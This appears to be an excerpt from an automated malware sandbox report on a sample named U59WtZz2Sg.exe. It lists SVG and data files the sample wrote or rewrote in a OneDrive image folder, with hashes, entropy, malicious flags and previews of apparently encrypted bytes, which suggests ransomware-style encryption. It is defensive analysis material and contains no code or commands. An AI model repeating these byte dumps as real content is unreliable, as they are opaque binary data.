Preview:	<?xmllV..b.+.A.....OX#.p.e....F...,.#.{.Q.({(@.0D....S..g.^e.T.g..[{.1..3...'.?QP9.V..:(].GuS .yOG.>N.j.4 .mq........c8=...a~,..K.V...)..z%4....5w..0.....[.f[.yq..Q.T.xH..j..I..G^Q ..4..gV..PA@o..r.....D}a/....r..5pQi.fr..D..e.t........#2R.j'....u..K....OPy.!zi2T.I+dK.93).PBOkh...R\|.(v....D...n..p..rA.2d_/w...#.N......T..Ch...[q/.d7.U.....X..O..M.`..'..;....F\...N....!...f.h...gFO.i.(.......{...O.rL. .6.....#..C..9..f/...!?....74s...k..?........'.@?#=T...bg.4..b...x......M.f..."...f...i?..^K.....#.1;TF.e.N...W.F...0...pB.P.....B.9.zH..N.B/..8q.).j..D......J#.gIW.`aA.)....5r....I..c:.i.......s.4....'.......( ....e:..}g......Y.J..J..:B.?..N.......~.......n.E...a$..,v5....I.k(..B.c....1........ssA.7'./...J....I.!GT.:AX.p..H..c.&..v^...9..C.!.`.eO...W.:'.....%...1...u..?s..[[J.\|..&..&....{@`tv.].M.....?....U...E......<ULXW..\|.t....DNhj. .f.........g6.....T.....m..\|....u.Bm..a[...E...+......a..g..e.@.m?2..NF<..0..`-W>.-9K.a...e.S..3.x...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\cloud.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1772
Entropy (8bit):	7.883580622085634
Encrypted:	false
SSDEEP:	48:5NisZdxnvea55DqAzwvLRkhVUr5OM09LaZzNmm/6XAcD:PZdFtHqAzwdkzS5m2Zj/6QY
MD5:	7BFF161ED7146E1AAF6D2909F3DF35B3
SHA1:	365254FE52EF4CB4B773D55538281B9F160340CA
SHA-256:	266AD198F239E32650892C00BA73CB8E7A2C4E1D05872C7028F5BD1E4F027B9D
SHA-512:	2E284B59CCFB5B2BD2A7CA3E1D2AA4A02BBA4D6E5B8D29C99BC4F38A2F6616CC1EAD915CFB4395BF4B0D60519F35D493398365391139FC20B9A92D6303302957
Malicious:	false
Reputation:	unknown
Preview:	<?xml...&c.m....F.e.r.k..6..sV......p...'%..'......G...ME...>.P.L)d7{...nU..!j.....!..p....u4.....%d...V'X...F.,..#..y.....U79.~....pz.....]d...c3..Ku.n.z~..Y^ .X=..@"0...M9?.^}@.7.....#....%.......d..E.z....`z@./.........."i2..5...{P...x.>."...(.s...aqy.......?..U..6.&.vv...N>l.}.}..p..G.y.}...9.....;....@8.........&.#..H.....yt.E.b...LH..p._AL".n..U.X..o4..m..N....A..W1.j.{.lz q...7Vr.....%@...X....~.U].U..7.^..6(...q7.g..zP._..D.3...<Sz..._. .....tm!M!!.O~/.K......:v.V7..w{+.>..&...F...Jw.~M.R..p.G.1.F..i..{wH...Z..H...AxW.e..k..Y.Q0...k...Gvc.b......T....T.......y...Q..o.}.,...O;}...Q..+...Fn.N.+g..7v....h8.....I....I.e.o..y...\).b.,Q..6@&.q.^...,$K....B.m..J$.....!.....1q..C.xn1...6.....pq.V...`......W..c.J......%.&..\|.....d#.H.;e.....:.:{.?h.B...3p.........o.....b.^....}= d.2.u..=]}R..#.<..-..S!......... ..._.U...2E..+y.g.^....n.......<.J.O..&.JR.....&_;.`+A....(.....>1.U..f.a..L.j~tB~Q.....ze9...v...Csh...l..5M.......T.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\completed_icon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1278
Entropy (8bit):	7.841860992693647
Encrypted:	false
SSDEEP:	24:tiEJZEz36i2ln9M7GS+2vSXwWD5+POjMdZooFrZCL3XCv19fWOJl2csbD:BnmS2aXhD3wdRCL3q19LH2cmD
MD5:	EFEB2151D7756FED7656A841247F7BD5
SHA1:	2217F9C6C1F2538194113CE742904FD9ED9BC412
SHA-256:	27D843D74D900C964B2C0F1CFB1C089ACFD8FEA41BBEE2FEABF1501076CDC5BB
SHA-512:	352B97484B5EC360A1895EA06A710B3228B4F534C0BD9C1FBA61C755C02FE2F5AE8BB181AFDC1EEB771D4C48F61414BCB97A626000C7BEB92F77C3BFBD327406
Malicious:	false
Reputation:	unknown
Preview:	<svg +.Q..........B...Y...)."?+...?.6.PJ..mt.....aB....>.....%f...G,{}..J......'h~?..^.......G=H.#.....-......J."..`..#.F..H7.Ec...!.....J...K.....i.....$.x....N...qa.....N..64ei.gC6.B.\....U.....P....k.."^.+..?JO..\|7...w.E...,.S....HQ.~n...N.=.J\|."..#.j...&...\...&.'....q..1.-p...8.h-....3..P.@..?.g.........t.\|i.J"..{7EBh.9.4GJ.=p..{....6........2...-.>.M.U..Im.D..............d/.n..".l..................^..("...}..\.......b..m"n<....\....hl..E....$. '..v.;fs..#............#....\...bu....{...!D.......^..r../qH...[..{G.\|....%......8.......v..).A....l.>.+6.t.y..>...<......a.....Z..28..`.B1..).c. ..'l-.r......A...oe.E'....e.......=.xV......V........+...{........O...6........3`<;a....T.2..;...!g..........Z^..8skJ...O.?..S.m. ...%......q..8i..q..H .iT...t...........\|V.._...d+.....^.........8.f...x).n...cL...Mc......>.a...>....%..a.4Y........<;~..a.&.%..i.d.3u^B.....G.py..).}.6.&!...p$..lT.."w*...\..m.... =E.n..XC..Z...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\done_graphic.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	15559
Entropy (8bit):	7.990250584729677
Encrypted:	true
SSDEEP:	384:wBhnTP6iZCGeGXxMcwsf/LNWc7qifiydHnbddc5wx:wvTPP7eguefMcGmBdcex
MD5:	738556E7D3B58EB8B6D262AB6D3C37B8
SHA1:	5F132E993E4C542072BB7B68D72F782018925792
SHA-256:	F1304B1F91070F64D5B09B57E1CBEBF709DB077CD14437740EC1DB6F14E65888
SHA-512:	2A0C6889B9A3DDF3DE1BAD0E6402AC902B7C4F94BB62EEC6E64A72EC5CEC58AE6E7A99957DBEBA144756B4D804371C3198202141D13228714B382108CD0E5959
Malicious:	true
Reputation:	unknown
Preview:	<svg ...B..Mi............@{.S._.A<.+#.E..%=..D.w.}.c....X....H.......F...-..F.#..Ab.)...p..A.{ie...S.g..A..q.w...B..hdY........u%.}.>...R8.x..<.M.........l.i.....H..$.d.U^.MX....!.g.\|..N_.r..F...;..%X.......@E..\...U+..U.....Ydl.V.H...LT6W.O..A.B.........U._.....4..J...[..F..a........M..).Sqt.;..9Z..J.xy...I@..!..%..]....Tl..'~..0s.Ut(..Xq....2.sH.s...^.[... .,....?.......~.f..]&m...X.#.~....>........T..j..n....d..M.N.;b.w~.l...nN.T..3=....:......;kK......!.......W#...}...b....5....d{..o....c'.6..Fg..\|......wr...N...o.}q:+..=.>Eb.\....kPX.. ....J..F.<[.O..4+.p..\|..Q..<W.4...X!_....W.,..H5.R..A.s)....<.. ..9...Z...t.{[..9....z/...[.g4`.e..t.....J....<w+.%.5......LTB..nr.aj.-%.....R..7as...3...Tt1..X=S.!..`(....@...%.d>.L.......xKUt........._y5.%.u...j...v..V..Y..-sJ..n.<...$_.F.'"U{..z....'../..k..y.9_.E.8....O.=.\..%.k.*.p...N4....".}..p...6W.\|j..V.R.5Y.....^/..js...S.F4..\.N.]$'.f.!-..p3i.....:.lldD........)........].la..].....p:

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\errorIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	964
Entropy (8bit):	7.807309857111772
Encrypted:	false
SSDEEP:	24:tybxq8XIHo5by4cO4mFZXXF/t5zoqfn6PSjinrla7bD:M1SM1t4mFxXF/foqfniSwrQ/D
MD5:	F3815AA7F9337DDB02BF07D165C94AD3
SHA1:	58DD80856BFAEC06085E19CCDEE891E591791D5F
SHA-256:	EA349AF1B89EED30CE607B06E6A3F7E5367BC56634B6CE3DAFB501834F6A3027
SHA-512:	51AAD13BC418FB7D77D6461ABDB6FC39E8F66A83A118CC01ECA1B69D4F3E5B5802AFD091324D4517291A02CE89AF1A6B7F0AE4F89FA867159240807322BE4499
Malicious:	false
Reputation:	unknown
Preview:	<svg ..Yn,.f.......?;..z./.0..p..B....E>..)....3)t.j.h?v<f.@B.;.YU1.'..tfHk4.r=.L....T..8....T....>.18...*{.....%[....y.A.M....d...h//.d.....Q.?..\|j9..?i#P..W.>...L.=v.F....R]./.]/`..f....O....v.i$.px#...Q....%..'.C%..Ugd.t....(.hG......#.e.G.DG...H.V......f........#}'....,.....l...9p1D+.5..n$lq.".le...... M...w...J.;.b,CD.8...d....K2.H.L:0).u....cE..G....z.o.[.....C3J%....@9..]:F'.9...@>..o!..np..{.)0/....l...%..U..#..8...A.k..s./.F..:[..<...{\wc.n.....O+j..5...;..}.l..c1.x\17..Z...A.JUz:/.....n...........A.k$..b.d.;R...9vV,.......d.....Xh%...Wb...b..G?.....m......."...B.....#e..:.ZU...D....c.-..D..8.I.a.!`JEZI.#......N..KS<.\...1.^.;P/..a.................pK..^./R.n.f_...N.'..>.R>{.=.(....../f...&..1.s..T.#q...Z...pf.g+....e.<..X.z..}F.p.S9k..hZ._..u...9.d...$c.q2u..e...GU....i..os...u.C.~.N........#......9.$..L.&+&.....1zX.>...... .EK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\finderExtensionPrompt.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	36719
Entropy (8bit):	7.99526710076474
Encrypted:	true
SSDEEP:	768:RqgNSF3P378WU85ugPURvzd77BDbTYPXlbJlyJ/j0v9MVd:YMq3v7Ju5vVZbabJlcjk6
MD5:	69CAB786326C49D924697C8D16DAEF8F
SHA1:	102E6BAA03765664228F5C6234035B9E85D39F34
SHA-256:	AE6FAC3A18C5FC1E3AD0200D10CDF8178215A9F55C569FBF3F1E6268E62CB671
SHA-512:	CA305D457F79C768BADBFC70EC01925BBA66026AB76706BE6CED47B781670245D7B7BB84CAE92744253EB669549C6920B6C49BC92C14A5557BE91F4F1861A1F2
Malicious:	true
Reputation:	unknown
Preview:	<svg .x.),....b...K.q}...gK4%.M.m"bL.8.....H=xL.?.T..,Hr.!...f.{.5..........q..H.\LS}k.qK.md6f.).....U:.....]..j..j{.o.3...<'....<.....G.....T:.M8.....\.U..$.D.:...)$...G...K`..L..H.~M4.../...R=fm.8.{........}.....?Hh.......\.._.u..e..cw$.z.=...c....Dy..\S.'.....8..u.....:....q.Ey...&...(,....E7./R......9.0.<>...G...YS.Z..?...Lj..G&.H...P\"N.Q.,p....._.$...u.i.d.%.QS..(.1.F.z.Z.Ux4.S.3.52....V".}{X..\|{....$~..2.!.&J4..`D......W..+_.P...^....6.....\.n.....oo`...U.G.....eh....mg..y....$,.!.p....^.X.j....I.7.U..... 0..Ty.A?...S4.`....z).Y..Z...r..(T+F5M.S.,...d.....X.R...x1.{a...T...K.....T.W...[p;L.......(b.>....y..R.d..b.G"..p...(.;.h..[.>.5...Ok,.w..8s.J..@....{AF.<....Zp....}.............,.awSF.....B...9..X.D..a..O.NC.^H'...7-..\..X.......L.b..8.Sl."..7..0..?....W.obl.7....u...I.VpX...6..c...fs?..E..k\|v?..F..aNu.....7S../D..t.....`L7.x}p{....S..nI.>.E.4...:.{.d...G.. ..c ...'~Ke..3...Z...N....g........h2E,...g..G[.o.I4....b...Y..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\folderIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	7.829342849876101
Encrypted:	false
SSDEEP:	24:tFk8aB3GFGjToR3FLouvnYrEQ8/c5j1/5wYKiGkJVVd+Js7SOIIbD:Xk8Q3IGjToRZjQ8kHKYWOVMJISOISD
MD5:	A88147C55C2DD9DE89B1CFCF97CA479B
SHA1:	4392AC773023BDCE16D8E28EFF06D0262E05803E
SHA-256:	CA1AEA349D2CEF85968647ACEC3CC0088549BC48A17757D7198FBDB1D9B21CF7
SHA-512:	496C84B641BDAFD609536481269ABBE2B43D82617EC6FAE9B73E24B929BDB67287888D1B588D242E4955998223C634D273CE986B2179476CE90068344868227F
Malicious:	false
Reputation:	unknown
Preview:	<svg &.....gn..P}2.J ..........".P..l.yD1.Da....g.....+v.b.K.....z+...h.d .{#7..:....`.[........x77...;..d.e....Q."...5k.-..=...`p..3.[^..B........#4S.....\?...:.iD.....w..1I.V.h.o<...-...;....(j.\|.Q)...........E....d...;.x..z...\|e@..hT.e.]..m.0.-p.(...X.q.Mku.k..=v.p....y.a4x.....Y~,.?..k.$.86..z+..$s.%...[V..[....}n.h...:l.....g r.r@.z...uR.c..K.&.+l6<.hE......+X.......8......[.g.@..aJA-..7.Hx....Zl..o..\.CbEt~...%..\..(J....:.t...A.....}..~......9....`w!..{.e.....+.b.E:.!g4...PKg.VO.k.}..;..{...u...o{........s.@..S&.$.D..J.b....(..{...s..}..>...h.../.p.......a.qW..........J./..5 ....c.h...4-%a?.S....k#.n......E...&.f%.?.....e.r.....e\|...R..8.k..j[.d....5..... /;....b.4X....rY.ZC..'T.f.Z.$...4.:^...Z...:.v\|.`&.@.Jd...@x.''.!..If....U2N...T......T..Y.\Tk.X.0/.Hq[..r.'.u..U..S.g,H\|......~...]c?.&.9.M...........!..B....:..Z.0OpZ..kr]c/2;&.v:......d..v..7./.l...T...O.....{&...8..........%...s.B.r..'.....tW.....~........*..B....,..^...Uh

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\folder_image_desktop.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2281
Entropy (8bit):	7.908648608220696
Encrypted:	false
SSDEEP:	48:61LME2w1rvJxEWjCzpGXNDVLmBGLnGJtT0jUJl7E9SjwWEH4lNkDHXHagD:bERxJxEbzpGXNDViG7GDTPJl7DwWEwYr
MD5:	845C798599DF998EA64C42F93919E0E5
SHA1:	D51C382A33320CCE87268E2321492E9D21E363CB
SHA-256:	E2738B69A480EBA86049BAB7494E7C34C79051C06BA5818CB92AD13B510409DD
SHA-512:	DBCC15D764EBA262DDF92DA7C2791FB3479871AF0A449B27A6B6345395D2A91C3756852CBA21C4F746DBCCED2C1F4AE39701338DF90B469BAE0253D51CE9BA00
Malicious:	false
Reputation:	unknown
Preview:	<svg B..73.S..D.?.or[j\|....27.._...LAFj.\..}.]T.m..\..\|......x.P6.....B..i..6-.7.$.(..q.-...7.=I...o.-;r{..O`.....x..7....+nN6.a.....X.ky.a.H.S.a..}.>Al...u..!Z3h.5.:.....L....L,..([..z...a.u..J_b.\|.^..5JsD,...Np..5f...t......V...mj..p.U<BM.........o...9..Q.DE'...z.N0..2CMj.B.nI...l^.C>T..f1."d......2.n...DN..&.P.Lm..`..Y..-.'Rk...w-V.l>P.4:-,....a@q.......5`ga......V..Q...P].6H=6...]........r..r..N.`...4...S$..a..._.W...A..MjY...+........$y..!.n1CF....fNt..B..w.Gu.0.]Z/...`.....<......h.vRxb".#9C...0...3.z.>g........-...nQ.F.....(B.-.P/._.y5.h6.\|.b.xW.().9\|^.'.m..>....?.,}Si..G=..1...r,K.Y.K!}..#1...;pd..[......eL.T............_.p].g.......cr.......FY...'.6......._.. .....x4(.:..+...I..-..\|4u..I(?I:.3.4.q.?.:.6.l.<~r....<..y.._.4..5.o.K).#...K.Vx....4.Ox...2;.F.r/+........>..}Fi..0G.a{.."r.^C.Q..w._...~q..3.o.n.U..>\.W.e...V..7.../Kb......(."5.b..{..SZ...s-oK.m:y&L"..U.^..g:/...I*53..S2....._.\|...{..x\|&.@"@!P...f.BwSl.[>...5....^f.t

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\folder_image_documents.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	20863
Entropy (8bit):	7.991921599068384
Encrypted:	true
SSDEEP:	384:RJTL+nOWV4eB+svaQrLvStX6UjjuxMWrxzxCkprFAbMH3gq8JwXkyv4k6:RJTL+nHXB+s/Ktri7xC+Aww4316
MD5:	442A627E788D58CC68874A246CA318C7
SHA1:	D733EF103A74B29E5DF33A0946A3AF149C21FD81
SHA-256:	65C4FB4FFA0E4857783CC229D3FEF8442AD1E129E992BB3B49CA61848282560E
SHA-512:	E82A4637E5C5D0BCD5B395D9F2E999BCD7A2498B3BA7A76E6167925AEFFE863B6953C6AEA46C1A734DB39EA906C0058A5D5890C4E3234E89BEA03F8A732ED696
Malicious:	true
Reputation:	unknown
Preview:	<svg ..g-.......dAt......D.T...3.G.p......,u.<......\|i....G....\|..=.....X$..N...9T..mj.[......5....+2..L.P..T...J.(....q1.w.....#.,L>!>#.X3..+.N7.x.fp..W.9g.-5.J..U.[...0._...f...X.%..!. `S..>.&x.Jr..3........d...m.<F...p.KQ.g.....2.&.A...d.61.<.....Y.=.k.Q_7e..s=...@.&...........(t.rg....m..ql..H....d......zG.J...>.)SF...U...;.......' ...D....B...M.W.cv.d.'.,B.s...\|.Se.\...(....G..%..?......^.g".`%.kW~..qg...k.`...\w.C.q.......q.Z.ef.."v..'Ae.\|9.Y#..n.2..{<._g. .l.........3..........W.]....C.L.8\|E...1~.......r5..R4;...z.v.tn......0lr..D.].L...6...5..o....=E.~.n..z.!.u.OD..E..<......O.H!.:S...B..$=.}W1A]...p.H'Po..i.\.N.0.........!.X..X..i.....^G..P....% ..44.=...8t.....Q..H..T..vS...%.X.Z....$......dZ...........X..~..AvC.._.....Z...h...]..3..%y;.Le..+y.Q.>k.c.....Bv....;kt.*.....S..j...-.3..vp.5cj..a._.3...U.~h...%(......\.!.{1,.R....y.n.60.b...t..n..A...L..]..e...K..v......Vo..Y.......3x..NqW...<.mE&......E.&.B.."..^4..\|

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\folder_image_pictures.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	12878
Entropy (8bit):	7.985326632728835
Encrypted:	false
SSDEEP:	384:Nlm6fyGC69GxPX/Pj4IucSZZ2M2MMgUYNWlazMq:N3yZ8G9PoZLU9AAq
MD5:	0B1868C8AFAB0E49725146DC37CC5B08
SHA1:	6F05C820449592BEEAA773D8EB3E8A13C9E17C08
SHA-256:	C7D5314D25D7CC79CAA5B17D72D51215EDCC7E912059630F7B32A618841943BC
SHA-512:	7E4ABB79BED8D4260E107E858F6D20ADB4FBC38703854F40410A3600C7E0870E7FAF5D35AE311434C4BD5B2C6DBBA7962201FECAFFAF80893DCBCAF8C4A045D8
Malicious:	false
Reputation:	unknown
Preview:	<svg ..LvAm...L}..I.q.zm..w...x...F.Ae-..".q.`...C...su....u....[.O...,o.r.^......v.0.AR..Zj.....d.....a.....~.t\|..EA......vu.4.t...7..n,...Kz.W.Pd...o..7.`.Nh!Q.)...\...j1..B...T....g..as.e........Z_$.;.,,.....g?:...4Q.E.....l.ig...=..#...U.Ap.......f......!a.....MU......x$....J,.s.1..X.%.e.Q...g.~(.....v...1^.y...{..V._..sB.Q..C..im}..b.;.".Q'..jnc.........t..^..........7.Ci...}/@.M.q.f....Z_=...:L......~}...N...0........A.6.{o...~.1...L.@`0.......y.....s._..w...9..q...fi..+..?VT%.{.h...>&G.,.?.......h.zqrY..X..v.L...>T.tu..o...:. %.Y.t..d......i..n{....=...b...S.L.r..0X6i.xO..MG3N.e.OyH.p2.N./3...l.='.z.}....=.....E"...+...T.k1.h;..?DY..f.......id......\W...N.A.v..:>[..6.j...0.z...1.K.<>R7V..uJMd....7s..........:.j..C._...X}%.w........_.O..T.Rc.ha..v;m....j..g.......@...r$..4.(5...s.e.x.V.LpzR.G...{....t...v.Md.pO..Q.Y......!.\8Wm9(...S)....5....A.k(.W...gu..)7.....0+...*.....r2HM.....D.3-.@b..$..F......?.Z.S..i.]6.4%mK.Z-.........

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\forwardArrow.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	564
Entropy (8bit):	7.6311407670835
Encrypted:	false
SSDEEP:	12:tqZanjv4FGjGcv5mxwpQXzIr15pfqNqEWUhICze0Mtcii9a:toE2Gj3mxwIzI55p/U6bD
MD5:	04904D3FF7E802E8ABA80AFA43DCBAB6
SHA1:	566E8E6F547627A193FF7B79DF285697ABE658EE
SHA-256:	DC32177ADCE4D9AC0790447C7A150165A4579915CA4D398C54EA7D000335F9E5
SHA-512:	35BC5422AAEAE9D1C2B6EF4A06FF0385F205B5A34F22C171242922E8E06F89A6EB9C8BF255A04C2957537799566501AA1376636D02A46E8498CEA93329EF5915
Malicious:	false
Reputation:	unknown
Preview:	<svg P....9.V..........e.m!...#:..^.kck....U..yNmn....w.]..Q&...6.&.D'd.....h.....g..f.[..j...9.X.@.J.....a....'..9.].....5..'.h@.$vc?..(.+n.sL..]..FC.U.8....&.(......R...kf].....CT"OO..T,.;...e.x.....P.......1.`.%..[..2(o{.>~.v...$.[...x/........]...[.2o.~\.).x!.-.T....._.#.R...j_..<f..dMU..[.>.z8a...o.....O..`.v..Z.)..P%GY......e...9.=.Mfqh..%<.....i...L..s,....%..%..Z.....t.B.@Lz!.#.n.J.....DC..zM}..F..%..~Z$..3A...*S2i.g5$7'..ENBK."u@-%..dj...p8..:JEYK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\globeIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2586
Entropy (8bit):	7.931617804575645
Encrypted:	false
SSDEEP:	48:5p+XHPA38i3+Jpsp3qj1tc9by0MR7UfCHqqBWsmnGs+iCOn7E3c9LxZD:eHPA38U+Hspecc1R7UAq7se5/COttR
MD5:	02893CCC13EB7201FD35AE02304508AE
SHA1:	8960581C1FA7C8FD18A9C343F90010880C313B56
SHA-256:	A15D09097188CCE6EEBFB4057F44AEC944D6D51039CE381FD61F89E86E6B6AAF
SHA-512:	8AA4877F27AA00C0A2BB7FAF91B2A6F47E69EF9318F90390DD05BBF348D8AE735E4482DA669AC44C75F5E93F96B7F42309801B926FB463493161F205FAF042E8
Malicious:	false
Reputation:	unknown
Preview:	<svg ...0....5Q......l.. .B.X.?.>N.phN........b../s"......y..`.N.C.A...3......YV.C.(=.EM.......pO.cf...{6...c..W6SQ..G.Q].....6..5TI.P.......o$..y.J.v...h.f).3..L7..#x./...t...APQ...G\q......sd.._...s....I......;...K....D5.mPM..W27I..{<.N..@.C/n{.p...$[..-'..C.6.c........o.yc/8..\|....5...:..D..)./......G......p!9.<..P+9.%.:.H....Pt....O8...1.....Am..z........5.pyg....(BDU@.......C.k....m..)..8...bl.....{..~.V....K.R!...=.. .;_.....J....m.rg`L.\|.zN....D..F...Q...+.o..o..\|T...>.Z..7.S.2.e,.$[c.._o.D..$...'.......4/j].$U>......]...N....Ie49;.~...bi....h...g^.jO.[..N.........#y...E.O.8....MT.;.5.O...`.....Nau...b..N....o~/..7R.d..#.A8.Q.CD...W$...tL....M~....Y8~.....Sb .Lw..x...5...S...K.z:..x...UiF..)x.{...\{..Z.S.n8f..r..)x.dC.f...i6..B.3F.Y.b'.m...`me..a.G.s..bR.F.!`..I.e.......z.w..Z.-}.8Q?..BQ.cZ.K...+c"...>.....2.t .......#GN.0....Fb..w...F.Dk..c...........(...N..j..nVw.3B. .....l......@........w.\|......zo.......8....a_. c.F..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\iceBucket.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	6268
Entropy (8bit):	7.970186603275911
Encrypted:	false
SSDEEP:	96:yNzfO32OFBBgTStFq7ax1eSOwW56S/HeqQObY7ZOHz+SaqUh4Ru4He+c6R:yROfBgmOmx1FzW56m+NOQZ0xjHjc6R
MD5:	5B184874D78354D2B7EBDE2369A138A7
SHA1:	64F6D8ACB6DE4FF67867034D8782C1FAE01B2309
SHA-256:	D4E49C350EB64766F30E40DEB3B0690F31F6C443C313A5C95D96AA8C42C8EBBD
SHA-512:	B6EF74BEB63244281F12AEDC74D940645F70C23FCA623C44478F877136B435F0864E195EA85C3BDBEDAC07A0C166F9BD3EA313635A60DA214561D3266E283C64
Malicious:	false
Reputation:	unknown
Preview:	<svg .k.j.S...."~K0^....E..oV.d.......[.N1...W..&....~WI...'Q.7.Q...E9....u5R.T.YhudHT.{...@N..H....P.Fs@C/.../.8?AG..E.c..7~!I..\|....U.....'.c..D_...X..s.D..../.........fC.\.'.79.!....+....D.....L..?.B..S...&c....X..%.xp....x..&..-.\|..J....../.IX.;..H.%.H...D.....k...t.....4C........T..f..s.#....9E6.......'>z...H.d .N.......th......+w5r,.......d.'......>...._B..0 ,..(...>d...`..H}.-..}.B.!.#.#E..L\|2..&.3........3~....`..c....a..ZS...h..0./.....}.E[..6l../..fn..-eLs.J%e......%.e2.I@e....8.F......m.&....u...TmO....}c.......VT......L9a.I........8X...}..;../....6..H;.....k<.J...".......a...^.9.v...9}.(y...1k.u!P.....fa.l...yPA...L:_.T.....h.J......f4E.....].Z.T.R.E%.T.Y....)_X..w........=...\|...\ ..j.47.jI[...}..g...1-z}...ig.q.E3.......#`~.u.&..,.t.F.}y.@./.....t..Z%.....j...P...r.i*-.K.xl..4...2LDG...G.h....'5O.Ta.X..k.u... ...M>..........x......+..SKL............m..5....++..8....c.K...B...i..u.._.......#.......s........%.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\infoIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1210
Entropy (8bit):	7.818406805862918
Encrypted:	false
SSDEEP:	24:t+BnzutGLibfXIEW816lXRX+T8IcsebXOhG7vDQwGdeipBDxbD:YzoFvIQYseD/hGd/pZhD
MD5:	8E0355D8FC85A3EFBDBEE3517638CC8C
SHA1:	5EC3BEC2DF84111A7D30EA3DA15F66A211BEEC26
SHA-256:	3E2A80F93A815FBBD9359BA218F0179D2E2F188B3BFC18E4CE0E1EF2C6740210
SHA-512:	09247ED4C63E25D8AD1EFF02BDADC4DCA498B94D49736B0D94D272BB6ABF08352B0E940FE9768378EAB98C6E553D932C17C184BCE953DAC30C5B368891FA272F
Malicious:	false
Reputation:	unknown
Preview:	<svg 0..q..W(.... b.^...~...q.Z;wr...GL.[c.aV.^2CQ.....`.`.T......S..4@?.H.>+.q..j}.4..3.`.,.k$...M.o~&......$>.m<P.......Iv........a......s..G:\|...Y.e(.U..-'L..-.+.3^.....(.....C5.. x.....y.{......U..n:{c$[W.Y..p..R..x.}...JG.z^RQ......}.vGW.>...-L...c...'S..G.\..c.."U1.%....y..E...i.g..\|...jx....p..~Z.[.7zY...R...qd;.....&-.7. =U]PygYx`..Y...i...D.x.-..t.u...]4.../.u.a..5..?F\|f.a...krQ..8...'7'...R.:..L......8p.......^.t..:..pB..S .~w1..Wq._.&.....8V.......G.m.J......L.....?WlP>..K...:..\....5C....~W.=...8....[U.\|...EA\|r\.k...L.r22...$..;._..T..........].v.G.:E.....A!?....%........r.h..$..>.D.^y.....&.+.x..Ge..J&.P.4.\|..c.g..v.q..gU.Uo../...W>...o..yZ..Z...."#`q(+..c...D..eb..k.......1>......I.!..,=....%]@...\F'NVo.B^...Q.E.U.."...x.}....X..zmN....VG..%6.+....i...q.!...._..0p..7b.&.r..2..\.....5:-Q.!.U.N....Qi.$.Bf.u.Yl ..p.tX.^r...t.o(...X$..%.\X.=Y.m....z..1...u..;7'9.bv.........<.....=.#.Q...wE.....Zz.o..w.\.UK-....3..-.K.-.4....X#..V..\|

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\kfm_folders_image.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	9612
Entropy (8bit):	7.980500027767787
Encrypted:	false
SSDEEP:	192:q/pXbJcd/+QZ3jvzv2d0vW4BGtfyroabO2AJO8VkRQ9zAjhpu/QXjzL90:spXbKdlZ3jvjgl6owL9jXpjzp0
MD5:	3793435E278322633D5E2FA1FBFBFEB1
SHA1:	B91A90926AA6ACFABDF080A25E29738C5F17D090
SHA-256:	909655A5515C2AC1F3600079F288E109AA6A4E256CC46DA72E8BC2B30354B1A6
